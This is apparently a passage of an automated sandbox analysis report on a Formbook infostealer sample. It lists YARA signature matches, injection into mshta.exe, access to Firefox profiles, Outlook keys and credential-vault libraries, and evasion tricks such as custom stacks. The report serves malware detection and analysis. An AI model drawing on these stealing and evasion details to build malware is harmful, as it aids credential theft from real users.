          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AAB403_2_038AAB40
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037EEA803_2_037EEA80
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038BA9A63_2_038BA9A6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F29A03_2_037F29A0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038069623_2_03806962
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F28403_2_037F2840
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037FA8403_2_037FA840
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0381E8F03_2_0381E8F0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037D68B83_2_037D68B8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0386EFA03_2_0386EFA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037FCFE03_2_037FCFE0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03832F283_2_03832F28
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03810F303_2_03810F30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E2FC83_2_037E2FC8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03892F303_2_03892F30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03864F403_2_03864F40
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03802E903_2_03802E90
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038ACE933_2_038ACE93
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F0E593_2_037F0E59
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AEEDB3_2_038AEEDB
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AEE263_2_038AEE26
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03808DBF3_2_03808DBF
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037FAD003_2_037FAD00
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0388CD1F3_2_0388CD1F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037EADE03_2_037EADE0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03890CB53_2_03890CB5
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F0C003_2_037F0C00
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E0CF23_2_037E0CF2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0383739A3_2_0383739A
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037DD34C3_2_037DD34C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A132D3_2_038A132D
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0380B2C03_2_0380B2C0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038912ED3_2_038912ED
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F52A03_2_037F52A0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037DF1723_2_037DF172
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037FB1B03_2_037FB1B0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038BB16B3_2_038BB16B
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0382516C3_2_0382516C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0389F0CC3_2_0389F0CC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A70E93_2_038A70E9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AF0E03_2_038AF0E0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F70C03_2_037F70C0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AF7B03_2_038AF7B0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A16CC3_2_038A16CC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038356303_2_03835630
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0388D5B03_2_0388D5B0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038B95C33_2_038B95C3
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A75713_2_038A7571
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E14603_2_037E1460
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AF43F3_2_038AF43F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0380FB803_2_0380FB80
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03865BF03_2_03865BF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0382DBF93_2_0382DBF9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AFB763_2_038AFB76
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03835AA03_2_03835AA0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0388DAAC3_2_0388DAAC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03891AA33_2_03891AA3
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0389DAC63_2_0389DAC6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AFA493_2_038AFA49
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A7A463_2_038A7A46
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03863A6C3_2_03863A6C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F99503_2_037F9950
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038859103_2_03885910
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0380B9503_2_0380B950
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0385D8003_2_0385D800
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F38E03_2_037F38E0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AFFB13_2_038AFFB1
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AFF093_2_038AFF09
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F1F923_2_037F1F92
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F9EB03_2_037F9EB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037F3D403_2_037F3D40
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0380FDC03_2_0380FDC0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A1D5A3_2_038A1D5A
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038A7D733_2_038A7D73
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_038AFCF23_2_038AFCF2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_03869C323_2_03869C32
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F41DC03_2_02F41DC0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F3CEF03_2_02F3CEF0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F3AF703_2_02F3AF70
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F3CCD03_2_02F3CCD0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F436303_2_02F43630
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4362B3_2_02F4362B
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F454503_2_02F45450
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F5BB603_2_02F5BB60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0370E5433_2_0370E543
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0370E4243_2_0370E424
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0370CBE83_2_0370CBE8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0370D9483_2_0370D948
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_0370E8DC3_2_0370E8DC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 0386F290 appears 105 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 037DB970 appears 280 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 0385EA12 appears 86 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03837E54 appears 111 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03825130 appears 58 times
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: String function: 01977E54 appears 102 times
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: String function: 01965130 appears 58 times
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: String function: 0199EA12 appears 86 times
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: String function: 019AF290 appears 105 times
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: String function: 0191B970 appears 280 times
          Source: wavjjT3sEq.exeStatic PE information: No import functions for PE file found
          Source: wavjjT3sEq.exe, 00000000.00000003.1503410876.00000000016AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1505562906.0000000001868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000003.1605358427.00000000014A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A1D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wavjjT3sEq.exe
          Source: wavjjT3sEq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: wavjjT3sEq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: wavjjT3sEq.exeStatic PE information: Section .text
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@16/10
          Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\1863I7301Jump to behavior
          Source: wavjjT3sEq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mshta.exe, 00000003.00000002.3902512217.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3902512217.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3902512217.00000000030AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: wavjjT3sEq.exeReversingLabs: Detection: 71%
          Source: unknownProcess created: C:\Users\user\Desktop\wavjjT3sEq.exe "C:\Users\user\Desktop\wavjjT3sEq.exe"
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: wavjjT3sEq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: mshta.pdbGCTL source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tIEQBQsFNUYr.exe, 00000002.00000000.1520159882.000000000100E000.00000002.00000001.01000000.00000004.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3911627042.000000000100E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wavjjT3sEq.exe, wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshta.pdb source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00125130 push 276952D9h; iretd 0_2_00125135
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013E990 push edx; ret 0_2_0013E991
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124A47 push edi; retf 0_2_00124A48
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013AA8F push ebx; ret 0_2_0013AB40
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013F303 push edi; iretd 0_2_0013F30F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00131B28 pushad ; ret 0_2_00131B29
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_001233A0 push eax; ret 0_2_001233A2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00135C53 push 4D40979Fh; retf AA07h0_2_00135DF1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00146DE3 push edi; ret 0_2_00146DEE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124E7A push ebp; ret 0_2_00124E7B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00128686 pushad ; retf 0_2_00128687
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00124EC0 push A00DC95Eh; retf 0_2_00124EF3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019209AD push ecx; mov dword ptr [esp], ecx0_2_019209B6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B225F pushad ; ret 3_2_037B27F9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B27FA pushad ; ret 3_2_037B27F9
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037E09AD push ecx; mov dword ptr [esp], ecx3_2_037E09B6
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_037B283D push eax; iretd 3_2_037B2858
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F3E785 pushad ; ret 3_2_02F3E786
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F428B0 push 4D40979Fh; retf AA07h3_2_02F42A4E
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F50F74 pushfd ; ret 3_2_02F50F75
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F352E3 pushad ; retf 3_2_02F352E4
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F476EC push ebx; ret 3_2_02F4779D
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F316A4 push edi; retf 3_2_02F316A5
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4B5ED push edx; ret 3_2_02F4B5EE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F31AD7 push ebp; ret 3_2_02F31AD8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F53A40 push edi; ret 3_2_02F53A4B
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BA18 push eax; iretd 3_2_02F4BA2F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F31B1D push A00DC95Eh; retf 3_2_02F31B50
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4DB03 push ds; ret 3_2_02F4DB0C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BF60 push edi; iretd 3_2_02F4BF6C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4BF52 push edi; iretd 3_2_02F4BF6C
          Source: wavjjT3sEq.exeStatic PE information: section name: .text entropy: 7.995583264592467
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
